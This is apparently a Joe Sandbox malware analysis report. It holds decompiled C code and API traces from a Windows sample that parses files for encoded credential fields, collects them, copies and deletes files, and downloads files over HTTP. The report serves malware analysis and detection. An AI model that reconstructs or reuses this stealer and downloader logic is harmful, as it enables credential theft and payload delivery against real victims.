				intOrPtr _t160;
				char* _t163;
				intOrPtr _t164;
				intOrPtr _t165;
				char* _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				void* _t173;
				void* _t174;
				void* _t175;
				void* _t176;

				_t59 =  *0x41a81c(_a12);
				_t174 = _t173 + 4;
				if(_t59 == 0) {
					_t59 = E0040B650(__ecx, 0x41a7f0);
					_t175 = _t174 + 4;
					_v12 = _t59;
					if(_v12 < 0x20) {
						E0040B720( &_v284, 0x104);
						 *0x41aa24( &_v284, _a12);
						 *0x41aa24( &_v284, 0x414018);
						_t147 =  *0x41a7e4; // 0x6283c8
						 *0x41aa24( &_v284, _t147);
						_v304 = 0;
						_v300 = 0;
						_v292 = CreateFileA( &_v284, 0x80000000, 1, 0, 3, 0, 0);
						if(_v292 == 0) {
							L7:
							return  *0x41a840();
						}
						SetFilePointer(_v292, 0, 0, 2);
						_v304 = GetFileSize(_v292, 0);
						SetFilePointer(_v292, 0, 0, 0);
						_t72 = E0040B590(_v292, _v304 + 1);
						_t176 = _t175 + 4;
						_v308 = _t72;
						_v16 = _v308;
						ReadFile(_v292, _v16, _v304,  &_v8, 0);
						while(1) {
							_t152 =  *0x41a170; // 0x6283e0
							_v296 = StrStrA(_v16, _t152);
							_t182 = _v296;
							if(_v296 == 0) {
								break;
							}
							_t129 =  *0x41a170; // 0x6283e0
							_t31 =  *0x41a908(_t129) + 3; // 0x3
							_v296 =  &(_v296[_t31]);
							_t130 =  *0x41a3b0; // 0x628590
							_v288 = StrStrA(_v296, _t130) - 3;
							 *_v288 = 0;
							_t131 =  *0x41a334; // 0x627aa0
							_t156 =  *0x41a838; // 0x0
							 *0x41aa24(_t156, _t131);
							_t132 =  *0x41a838; // 0x0
							 *0x41aa24(_t132, _a8);
							_t157 =  *0x41a838; // 0x0
							 *0x41aa24(_t157, "\n");
							_t88 =  *0x41a37c; // 0x627bc0
							_t133 =  *0x41a838; // 0x0
							 *0x41aa24(_t133, _t88);
							_t90 =  *0x41a838; // 0x0
							 *0x41aa24(_t90, _a4);
							_t134 =  *0x41a838; // 0x0
							 *0x41aa24(_t134, "\n");
							_t159 =  *0x41a144; // 0x627ab0
							_t93 =  *0x41a838; // 0x0
							 *0x41aa24(_t93, _t159);
							_t160 =  *0x41a838; // 0x0
							 *0x41aa24(_t160, _v296);
							_t96 =  *0x41a838; // 0x0
							 *0x41aa24(_t96, "\n");
							_t136 =  *0x41a5b8; // 0x628e40
							_t98 = StrStrA(_v288 + 1, _t136);
							_t99 =  *0x41a5b8; // 0x628e40
							_t41 =  *0x41a908(_t99) + 3; // 0x3
							_v296 =  &(_t98[_t41]);
							_t163 =  *0x41a5b4; // 0x628f60
							_v288 = StrStrA(_v296, _t163) - 3;
							 *_v288 = 0;
							_t164 =  *0x41a06c; // 0x627c20
							_t104 =  *0x41a838; // 0x0
							 *0x41aa24(_t104, _t164);
							_t165 =  *0x41a838; // 0x0
							 *0x41aa24(_t165, E004077A0(_v296, _t182, _v296));
							_t108 =  *0x41a838; // 0x0
							 *0x41aa24(_t108, "\n");
							_t140 =  *0x41a5b4; // 0x628f60
							_t110 = StrStrA(_v288 + 1, _t140);
							_t111 =  *0x41a5b4; // 0x628f60
							_t49 =  *0x41a908(_t111) + 3; // 0x3
							_v296 =  &(_t110[_t49]);
							_t168 =  *0x41a70c; // 0x629438
							_v288 = StrStrA(_v296, _t168) - 3;
							 *_v288 = 0;
							_t169 =  *0x41a14c; // 0x627ac0
							_t116 =  *0x41a838; // 0x0
							 *0x41aa24(_t116, _t169);
							_t118 = E004077A0(_v296, _t182, _v296);
							_t176 = _t176 + 8;
							_t170 =  *0x41a838; // 0x0
							 *0x41aa24(_t170, _t118);
							_t120 =  *0x41a838; // 0x0
							 *0x41aa24(_t120, "\n\n");
							_v16 = _v288 + 1;
						}
						CloseHandle(_v292);
						goto L7;
					}
				}
				return _t59;
			}

0x0040906e
0x00409074
0x00409079
0x00409084
0x00409089
0x0040908c
0x00409093
0x004090a5
0x004090b5
0x004090c7
0x004090cd
0x004090db
0x004090e1
0x004090eb
0x00409111
0x0040911e
0x004093f3
0x00000000
0x004093f3
0x00409131
0x00409146
0x00409159
0x00409169
0x0040916e
0x00409171
0x0040917d
0x00409198
0x0040919e
0x0040919e
0x004091af
0x004091b5
0x004091bc
0x00000000
0x00000000
0x004091c2
0x004091d5
0x004091d9
0x004091df
0x004091f6
0x00409202
0x00409205
0x0040920c
0x00409213
0x0040921d
0x00409224
0x0040922f
0x00409236
0x0040923c
0x00409242
0x00409249
0x00409253
0x00409259
0x00409264
0x0040926b
0x00409271
0x00409278
0x0040927e
0x0040928b
0x00409292
0x0040929d
0x004092a3
0x004092a9
0x004092ba
0x004092c2
0x004092ce
0x004092d2
0x004092d8
0x004092ef
0x004092fb
0x004092fe
0x00409305
0x0040930b
0x00409321
0x00409328
0x00409333
0x00409339
0x0040933f
0x00409350
0x00409358
0x00409364
0x00409368
0x0040936e
0x00409385
0x00409391
0x00409394
0x0040939b
0x004093a1
0x004093ae
0x004093b3
0x004093b7
0x004093be
0x004093c9
0x004093cf
0x004093de
0x004093de
0x004093ed
0x00000000
0x004093ed
0x00409093
0x004093fd

APIs

lstrcat.KERNEL32(?,00626ED0), ref: 004090B5
lstrcat.KERNEL32(?,00414018), ref: 004090C7
lstrcat.KERNEL32(?,006283C8), ref: 004090DB
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040910B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00409131
GetFileSize.KERNEL32(00000000,00000000), ref: 00409140
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00409159
new[].LIBCMTD ref: 00409169
ReadFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00409198
StrStrA.SHLWAPI(?,006283E0), ref: 004091A9
lstrlen.KERNEL32(006283E0), ref: 004091C9
StrStrA.SHLWAPI(00000000,00628590), ref: 004091ED
lstrcat.KERNEL32(00000000,00627AA0), ref: 00409213
lstrcat.KERNEL32(00000000,?), ref: 00409224
lstrcat.KERNEL32(00000000,00418BC4), ref: 00409236
lstrcat.KERNEL32(00000000,00627BC0), ref: 00409249
lstrcat.KERNEL32(00000000,00000020), ref: 00409259
lstrcat.KERNEL32(00000000,00418BC4), ref: 0040926B
lstrcat.KERNEL32(00000000,00627AB0), ref: 0040927E
lstrcat.KERNEL32(00000000,00000000), ref: 00409292
lstrcat.KERNEL32(00000000,00418BC4), ref: 004092A3
StrStrA.SHLWAPI(?,00628E40), ref: 004092BA
lstrlen.KERNEL32(00628E40), ref: 004092C8
StrStrA.SHLWAPI(00000000,00628F60), ref: 004092E6
lstrcat.KERNEL32(00000000,00627C20), ref: 0040930B

Part of subcall function 004077A0: lstrlen.KERNEL32(0040931D,00000001,?,00001FA0,00000000,00000000,?,00001FA0), ref: 004077EB
Part of subcall function 004077A0: CryptStringToBinaryA.CRYPT32(0040931D,00000000), ref: 004077F6

lstrcat.KERNEL32(00000000,00000000), ref: 00409328
lstrcat.KERNEL32(00000000,00418BC4), ref: 00409339
StrStrA.SHLWAPI(?,00628F60), ref: 00409350
lstrlen.KERNEL32(00628F60), ref: 0040935E
StrStrA.SHLWAPI(00000000,00629438), ref: 0040937C
lstrcat.KERNEL32(00000000,00627AC0), ref: 004093A1

Part of subcall function 004077A0: lstrcat.KERNEL32(?,0041401A), ref: 004078B9
Part of subcall function 004077A0: lstrcat.KERNEL32(?,0041401A), ref: 004078CD
Part of subcall function 004077A0: lstrcat.KERNEL32(0041401A,0041401A), ref: 004078EE

lstrcat.KERNEL32(00000000,00000000), ref: 004093BE
lstrcat.KERNEL32(00000000,00418BC0), ref: 004093CF
CloseHandle.KERNEL32(00000000), ref: 004093ED

Strings

, xrefs: 0040908F
|b, xrefs: 004092FE

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcat$File$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringnew[]
String ID: $ |b
API String ID: 3141130001-818450462
Opcode ID: 83493bb6aca1adf2ef6831467ff656548a40d202072a372698ec97d6f1694147
Instruction ID: 7e99e970e00657f65ab1c061739f90e233e970cfeaa3462852b2302322d486d4
Opcode Fuzzy Hash: 83493bb6aca1adf2ef6831467ff656548a40d202072a372698ec97d6f1694147
Instruction Fuzzy Hash: 58A11AB5A11204AFC715EBA4DD88FDA77F9EB4C304F00C5A9F60993291C738A9A1CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00407D50, Relevance: 58.0, APIs: 30, Strings: 3, Instructions: 284stringmemoryfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00407D65
lstrcat.KERNEL32(?,00414018), ref: 00407D77

Part of subcall function 0040B8B0: GetSystemTime.KERNEL32(?,?,00000104), ref: 0040B8D1

lstrcat.KERNEL32(?,00000000), ref: 00407D8F
CopyFileA.KERNEL32(00000000,?,00000001), ref: 00407DA2
wsprintfA.USER32 ref: 00407DCF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00407E1F
RtlAllocateHeap.NTDLL(00000000), ref: 00407E26
StrCmpCA.SHLWAPI(?,00418BE0), ref: 00407ED2
lstrcat.KERNEL32(?,00627B40), ref: 00407EF9
lstrcat.KERNEL32(?,00627B50), ref: 00407F1E
StrCmpCA.SHLWAPI(?,00418BE0), ref: 00407F30
lstrcat.KERNEL32(?,00627B40), ref: 00407F58
lstrcat.KERNEL32(?,00627B50), ref: 00407F7E

Part of subcall function 00407230: memset.MSVCRT ref: 00407282
Part of subcall function 00407230: LocalAlloc.KERNEL32(00000040,?), ref: 004072D1
Part of subcall function 00407230: lstrcat.KERNEL32(?,00000000), ref: 00407337

lstrcat.KERNEL32(?,00418BE0), ref: 00407FAE
lstrcat.KERNEL32(?,?), ref: 00407FC2
lstrcat.KERNEL32(?,004191EC), ref: 00407FD4
lstrcat.KERNEL32(?,?), ref: 00407FE8
lstrcat.KERNEL32(?,004191EC), ref: 00407FFA
lstrcat.KERNEL32(?,?), ref: 0040800E
lstrcat.KERNEL32(?,004191EC), ref: 00408020
lstrcat.KERNEL32(?,?), ref: 00408034
lstrcat.KERNEL32(?,004191EC), ref: 00408046
lstrcat.KERNEL32(?,?), ref: 0040805A
lstrcat.KERNEL32(?,004191EC), ref: 0040806C
lstrcat.KERNEL32(?,?), ref: 00408080
lstrcat.KERNEL32(?,004191EC), ref: 00408092
lstrcat.KERNEL32(?,00000000), ref: 004080D0
lstrcat.KERNEL32(?,00418BC4), ref: 004080E2
lstrlen.KERNEL32(?), ref: 004080F4
DeleteFileA.KERNEL32(?), ref: 00408144

Strings

@{b, xrefs: 00407EEC, 00407F4A
@p`, xrefs: 00407DFC
P{b, xrefs: 00407F11, 00407F70

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcat$FileHeap$AllocAllocateCopyCurrentDeleteDirectoryLocalProcessSystemTimelstrlenmemsetwsprintf
String ID: @p`$@{b$P{b
API String ID: 3067815791-2153699925
Opcode ID: 44fd675b5e8f644ed4ffe8ab9f9041a44a66e566d68b538c606c3f53ab211c74
Instruction ID: 0472a7c7585205d9353b1484faec9d34f3986521201bc2a8f856e71ef692a447
Opcode Fuzzy Hash: 44fd675b5e8f644ed4ffe8ab9f9041a44a66e566d68b538c606c3f53ab211c74
Instruction Fuzzy Hash: 0CB197B5A41108BBCB10DBA4DD8DFEA77B8AF4C704F008599F205A7181C739EA61CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406C10, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 277libraryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(00000094,?,00000094), ref: 00406C3D
LoadLibraryA.KERNEL32(00627CF0), ref: 00406CAA

Strings

|b, xrefs: 00406E6B

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: LibraryLoadVersion
String ID: |b
API String ID: 3209957514-3879381372
Opcode ID: 48e87a5de84f717074b832ed21c0577e90c690f55c8f4d6b53ea31534da44a6a
Instruction ID: 05bfa34741bdcc6f61b31b7f22c3a432e1b570a345a4de00ebc14ecdda937758
Opcode Fuzzy Hash: 48e87a5de84f717074b832ed21c0577e90c690f55c8f4d6b53ea31534da44a6a
Instruction Fuzzy Hash: 6BC182B1612208ABDB54DF90DD88FDA77B9EF4C304F1085A9F205A72D0C774AA91CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00408C00, Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 284stringmemoryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00408C2F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408C7C
RtlAllocateHeap.NTDLL(00000000), ref: 00408C83
lstrcat.KERNEL32(?,00627B40), ref: 00408DEA
lstrcat.KERNEL32(?,00627B50), ref: 00408E10
lstrcat.KERNEL32(?,00627B40), ref: 00408EC8
lstrcat.KERNEL32(?,00627B50), ref: 00408EEE
lstrcat.KERNEL32(?,?), ref: 00408F02
lstrcat.KERNEL32(?,004191EC), ref: 00408F14
lstrcat.KERNEL32(?,?), ref: 00408F28
lstrcat.KERNEL32(?,004191EC), ref: 00408F3A
lstrcat.KERNEL32(?,?), ref: 00408F4E
lstrcat.KERNEL32(?,004191EC), ref: 00408F60
lstrcat.KERNEL32(?,?), ref: 00408F74
lstrcat.KERNEL32(?,004191EC), ref: 00408F86
lstrcat.KERNEL32(?,?), ref: 00408F9A
lstrcat.KERNEL32(?,004191EC), ref: 00408FAC
lstrcat.KERNEL32(?,?), ref: 00408FC0
lstrcat.KERNEL32(?,004191EC), ref: 00408FD2
lstrcat.KERNEL32(?,?), ref: 00408FE6
lstrcat.KERNEL32(?,00418BC4), ref: 00408FF8
lstrlen.KERNEL32(?), ref: 0040900A

Strings

@{b, xrefs: 00408DDC, 00408EBA
P{b, xrefs: 00408E02, 00408EE0

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID: @{b$P{b
API String ID: 3196222039-2011940280
Opcode ID: dacc5b97372733a4ba00ccc95a0c1e16af46acb8b8fedb2f4d0e5c5a2b3d8658
Instruction ID: 37d9e65b1a1885b2021265d91926de593cb986df4567ec96dbdd6e639e599f41
Opcode Fuzzy Hash: dacc5b97372733a4ba00ccc95a0c1e16af46acb8b8fedb2f4d0e5c5a2b3d8658
Instruction Fuzzy Hash: A6C164B1A01218AFCB24DF64DD89BDE77B5AF48704F0081D9F609A7291CB399E90CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00407AC0, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 174stringfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,?,004088AE,?,?,00000000,00000000,00000000), ref: 00407AD9
lstrcat.KERNEL32(?,00414018), ref: 00407AEB

Part of subcall function 0040B8B0: GetSystemTime.KERNEL32(?,?,00000104), ref: 0040B8D1

lstrcat.KERNEL32(?,00000000), ref: 00407B03
CopyFileA.KERNEL32(?,?,00000001), ref: 00407B16
DeleteFileA.KERNEL32(?), ref: 00407D3C

Part of subcall function 00407230: memset.MSVCRT ref: 00407282
Part of subcall function 00407230: LocalAlloc.KERNEL32(00000040,?), ref: 004072D1
Part of subcall function 00407230: lstrcat.KERNEL32(?,00000000), ref: 00407337

lstrcat.KERNEL32(?,00000000), ref: 00407BF7
lstrcat.KERNEL32(00000000,00627AA0), ref: 00407C0B
lstrcat.KERNEL32(00000000,?), ref: 00407C1C
lstrcat.KERNEL32(00000000,00418BC4), ref: 00407C2E
lstrcat.KERNEL32(00000000,00627BC0), ref: 00407C41
lstrcat.KERNEL32(00000000,?), ref: 00407C51
lstrcat.KERNEL32(00000000,00418BC4), ref: 00407C63
lstrcat.KERNEL32(00000000,00627AB0), ref: 00407C76
lstrcat.KERNEL32(00000000,?), ref: 00407C8A
lstrcat.KERNEL32(00000000,00418BC4), ref: 00407C9B
lstrcat.KERNEL32(00000000,00627C20), ref: 00407CAF
lstrcat.KERNEL32(00000000,?), ref: 00407CC3
lstrcat.KERNEL32(00000000,00418BC4), ref: 00407CD5
lstrcat.KERNEL32(00000000,00627AC0), ref: 00407CE8
lstrcat.KERNEL32(00000000,?), ref: 00407CFB
lstrcat.KERNEL32(00000000,00418BC0), ref: 00407D0D

Strings

`;b, xrefs: 00407B43
|b, xrefs: 00407CA1

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcat$File$AllocCopyCurrentDeleteDirectoryLocalSystemTimememset
String ID: |b$`;b
API String ID: 3522136165-894047088
Opcode ID: f3fd52fb4761c2a2e1c00ae7afb32f507db36117f99e1080e622c3acfdb5aeba
Instruction ID: ab0808fcc5ae4ac9d31269b52e8e6387a8d9148f66a13944e02c84bb448b15ba
Opcode Fuzzy Hash: f3fd52fb4761c2a2e1c00ae7afb32f507db36117f99e1080e622c3acfdb5aeba
Instruction Fuzzy Hash: 6C6152B1A11104AFC710EBA4EE49DEA37F8EF4C305F008569F60593161D778EA61CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 00405420, Relevance: 37.7, APIs: 18, Strings: 7, Instructions: 180
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00405420(void* __ecx) {
				char _v268;
				char _v532;
				char _v796;
				char _v1060;
				char _v1324;
				char _v1588;
				intOrPtr _t45;
				intOrPtr _t50;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t70;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t103;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr _t109;
				intOrPtr _t111;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t120;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t126;
				intOrPtr _t128;
				intOrPtr _t130;

				E0040B720( &_v1324, 0x104);
				E0040B720( &_v268, 0x104);
				E0040B720( &_v796, 0x104);
				E0040B720( &_v1588, 0x104);
				E0040B720( &_v532, 0x104);
				E0040B720( &_v1060, 0x104);
				_t45 =  *0x41a368; // 0x6109a0
				 *0x41aa24( &_v1324, _t45);
				_t116 =  *0x41a7c4; // 0x625b10
				 *0x41aa24( &_v1324, _t116);
				_t97 =  *0x41a11c; // 0x627950
				 *0x41aa24( &_v1324, _t97);
				_t50 =  *0x41a368; // 0x6109a0
				 *0x41aa24( &_v268, _t50);
				_t118 =  *0x41a7c4; // 0x625b10
				 *0x41aa24( &_v268, _t118);
				_t99 =  *0x41a3b4; // 0x6278c0
				 *0x41aa24( &_v268, _t99);
				_t55 =  *0x41a368; // 0x6109a0
				 *0x41aa24( &_v796, _t55);
				_t120 =  *0x41a7c4; // 0x625b10
				 *0x41aa24( &_v796, _t120);
				_t101 =  *0x41a090; // 0x6277a0
				 *0x41aa24( &_v796, _t101);
				_t60 =  *0x41a368; // 0x6109a0
				 *0x41aa24( &_v1588, _t60);
				_t122 =  *0x41a7c4; // 0x625b10
				 *0x41aa24( &_v1588, _t122);
				_t103 =  *0x41a604; // 0x627938
				 *0x41aa24( &_v1588, _t103);
				_t65 =  *0x41a368; // 0x6109a0
				 *0x41aa24( &_v532, _t65);
				_t124 =  *0x41a7c4; // 0x625b10
				 *0x41aa24( &_v532, _t124);
				_t105 =  *0x41a630; // 0x627710
				 *0x41aa24( &_v532, _t105);
				_t70 =  *0x41a368; // 0x6109a0
				 *0x41aa24( &_v1060, _t70);
				_t126 =  *0x41a7c4; // 0x625b10
				 *0x41aa24( &_v1060, _t126);
				_t107 =  *0x41a674; // 0x6258d0
				 *0x41aa24( &_v1060, _t107);
				_t75 =  *0x41a2f0; // 0x626db8
				_t108 =  &_v1324;
				E004049E0( &_v1324,  &_v1324, _t75);
				_t128 =  *0x41a650; // 0x627060
				E004049E0(_t108,  &_v268, _t128);
				_t109 =  *0x41a220; // 0x627128
				E004049E0(_t109,  &_v796, _t109);
				_t80 =  *0x41a6cc; // 0x625870
				_t110 =  &_v1588;
				E004049E0( &_v1588,  &_v1588, _t80);
				_t130 =  *0x41a4a8; // 0x626d68
				E004049E0(_t110,  &_v532, _t130);
				_t111 =  *0x41a700; // 0x627240
				E004049E0(_t111,  &_v1060, _t111);
				E0040B720( &_v1324, 0x104);
				E0040B720( &_v268, 0x104);
				E0040B720( &_v796, 0x104);
				E0040B720( &_v1588, 0x104);
				E0040B720( &_v532, 0x104);
				return E0040B720( &_v1060, 0x104);
			}

0x00405435
0x00405446
0x00405457
0x00405468
0x00405479
0x0040548a
0x0040548f
0x0040549c
0x004054a2
0x004054b0
0x004054b6
0x004054c4
0x004054ca
0x004054d7
0x004054dd
0x004054eb
0x004054f1
0x004054ff
0x00405505
0x00405512
0x00405518
0x00405526
0x0040552c
0x0040553a
0x00405540
0x0040554d
0x00405553
0x00405561
0x00405567
0x00405575
0x0040557b
0x00405588
0x0040558e
0x0040559c
0x004055a2
0x004055b0
0x004055b6
0x004055c3
0x004055c9
0x004055d7
0x004055dd
0x004055eb
0x004055f1
0x004055f7
0x004055fe
0x00405606
0x00405614
0x0040561c
0x0040562a
0x00405632
0x00405638
0x0040563f
0x00405647
0x00405655
0x0040565d
0x0040566b
0x0040567f
0x00405690
0x004056a1
0x004056b2
0x004056c3
0x004056dc

APIs

lstrcat.KERNEL32(?,006109A0), ref: 0040549C
lstrcat.KERNEL32(?,00625B10), ref: 004054B0
lstrcat.KERNEL32(?,00627950), ref: 004054C4
lstrcat.KERNEL32(?,006109A0), ref: 004054D7
lstrcat.KERNEL32(?,00625B10), ref: 004054EB
lstrcat.KERNEL32(?,006278C0), ref: 004054FF
lstrcat.KERNEL32(?,006109A0), ref: 00405512
lstrcat.KERNEL32(?,00625B10), ref: 00405526
lstrcat.KERNEL32(?,006277A0), ref: 0040553A
lstrcat.KERNEL32(?,006109A0), ref: 0040554D
lstrcat.KERNEL32(?,00625B10), ref: 00405561
lstrcat.KERNEL32(?,00627938), ref: 00405575
lstrcat.KERNEL32(?,006109A0), ref: 00405588
lstrcat.KERNEL32(?,00625B10), ref: 0040559C
lstrcat.KERNEL32(?,00627710), ref: 004055B0
lstrcat.KERNEL32(?,006109A0), ref: 004055C3
lstrcat.KERNEL32(?,00625B10), ref: 004055D7
lstrcat.KERNEL32(?,006258D0), ref: 004055EB

Part of subcall function 004049E0: InternetOpenA.WININET(0041401A,00000001,00000000,00000000,00000000), ref: 00404A0E

Part of subcall function 004049E0: StrCmpCA.SHLWAPI(00000000,https), ref: 00404A3A
Part of subcall function 004049E0: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00800100,00000000), ref: 00404A8F
Part of subcall function 004049E0: HttpQueryInfoA.WININET(?,00000013,?,00000100,00000000), ref: 00404ACF
Part of subcall function 004049E0: StrCmpCA.SHLWAPI(?,200), ref: 00404AE5
Part of subcall function 004049E0: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404B17
Part of subcall function 004049E0: InternetReadFile.WININET(?,?,00000400,?), ref: 00404B40
Part of subcall function 004049E0: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404B6E
Part of subcall function 004049E0: CloseHandle.KERNEL32(?,?,00000400), ref: 00404BBC
Part of subcall function 004049E0: InternetCloseHandle.WININET(?), ref: 00404BC6
Part of subcall function 004049E0: InternetCloseHandle.WININET(00000000), ref: 00404BD3

Part of subcall function 004049E0: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000100,00000000), ref: 00404AB0
Part of subcall function 004049E0: Sleep.KERNEL32(00007530), ref: 00404AF6

Strings

(qb, xrefs: 0040561C
`pb, xrefs: 00405606
hmb, xrefs: 00405647
Pyb, xrefs: 004054B6
@rb, xrefs: 0040565D
8yb, xrefs: 00405567
pXb, xrefs: 00405632

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcat$Internet$CloseFileHandleOpen$CreateHttpInfoQueryReadSleepWrite
String ID: (qb$8yb$@rb$Pyb$`pb$hmb$pXb
API String ID: 3671864319-1303013027
Opcode ID: 523f6f94308fdabadb63e5cab476504b7bf4905b54afa8b5587d7d0ed3e38dc8
Instruction ID: 5a6f90b88bf48c53f68c00fc2f1db0b98238631f3db8af8a6affdc9d9dd0ffe7
Opcode Fuzzy Hash: 523f6f94308fdabadb63e5cab476504b7bf4905b54afa8b5587d7d0ed3e38dc8
Instruction Fuzzy Hash: AB6178F6511118ABC710EBA0DD85DEA33B8FB4C704F0485AEF21593191DB7897A4CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004051A0, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 172
networksleepfileCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E004051A0(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8, char* _a12, char* _a16) {
				void* _v8;
				DWORD* _v12;
				char _v2012;
				void* _v2016;
				void* _v2020;
				long _v2024;
				void _v2284;
				void _v2288;
				DWORD* _v2292;
				DWORD* _v2296;
				void _v4300;
				int _v4304;
				long _v4308;
				DWORD* _t104;
				void* _t107;

				_t85 = __ecx;
				E004139B0(0x10d0, __ecx);
				E0040B6E0(_t85,  &_v2012, 0, 0x7d0);
				_v2020 = InternetOpenA(0x41401a, 0, 0, 0, 0);
				_v2024 = 0x100;
				_v12 = 0;
				_push("https://");
				_push(_a4);
				if( *0x41aa4c() == 0) {
					_v12 = 1;
				}
				if(_v2020 != 0) {
					_v2288 = 0x927c0;
					InternetSetOptionA(_v2020, 6,  &_v2288, 4);
					if(_v12 == 0) {
						_v2016 = InternetConnectA(_v2020, _a8, 0x50, 0, 0, 3, 0, 0);
					} else {
						_v2016 = InternetConnectA(_v2020, _a8, 0x1bb, 0, 0, 3, 0, 0);
					}
					if(_v2016 != 0) {
						if(_v12 == 0) {
							_v8 = HttpOpenRequestA(_v2016, _a16, _a12, 0, 0, 0, 0x400100, 0);
						} else {
							_v8 = HttpOpenRequestA(_v2016, _a16, _a12, 0, 0, 0, 0xc00100, 0);
						}
						if(_v8 != 0) {
							_v2292 = 0;
							_v2296 = 0;
							while(_v2296 < 6) {
								HttpSendRequestA(_v8, 0, 0, 0, 0);
								if(HttpQueryInfoA(_v8, 0x13,  &_v2284,  &_v2024, 0) == 0) {
									L17:
									Sleep(0x7530);
									_t104 =  &(_v2296[0]);
									__eflags = _t104;
									_v2296 = _t104;
									continue;
								} else {
									_push("200");
									_push( &_v2284);
									if( *0x41aa4c() != 0) {
										goto L17;
									} else {
										_v2292 = 1;
									}
								}
								break;
							}
							if(_v2292 != 0) {
								while(1) {
									_v4304 = InternetReadFile(_v8,  &_v4300, 0x7cf,  &_v4308);
									if(_v4304 == 0) {
										break;
									}
									_t122 = _v4308;
									if(_v4308 != 0) {
										 *((char*)(_t107 + _v4308 - 0x10c8)) = 0;
										 *0x41aa24( &_v2012,  &_v4300);
										continue;
									}
									break;
								}
							}
						}
						InternetCloseHandle(_v8);
					}
					InternetCloseHandle(_v2016);
				}
				InternetCloseHandle(_v2020);
				return E00404830(_v2020, _t122,  &_v2012);
			}

0x004051a0
0x004051a8
0x004051bb
0x004051d3
0x004051d9
0x004051e3
0x004051ea
0x004051f2
0x004051fb
0x004051fd
0x004051fd
0x0040520b
0x00405211
0x0040522d
0x00405237
0x0040527e
0x00405239
0x00405259
0x00405259
0x0040528b
0x00405295
0x004052e0
0x00405297
0x004052b9
0x004052b9
0x004052e7
0x004052ed
0x004052f7
0x00405312
0x00405327
0x0040534b
0x0040536f
0x00405374
0x00405309
0x00405309
0x0040530c
0x00000000
0x0040534d
0x0040534d
0x00405358
0x00405361
0x00000000
0x00405363
0x00405363
0x00405363
0x00405361
0x00000000
0x0040534b
0x00405383
0x00405385
0x004053a2
0x004053af
0x00000000
0x00000000
0x004053b1
0x004053b8
0x004053c2
0x004053d8
0x00000000
0x004053d8
0x00000000
0x004053b8
0x004053ba
0x00405383
0x004053e4
0x004053e4
0x004053f1
0x004053f1
0x004053fe
0x00405416

APIs

InternetOpenA.WININET(0041401A,00000000,00000000,00000000,00000000), ref: 004051CD
StrCmpCA.SHLWAPI(00000000,https://), ref: 004051F3
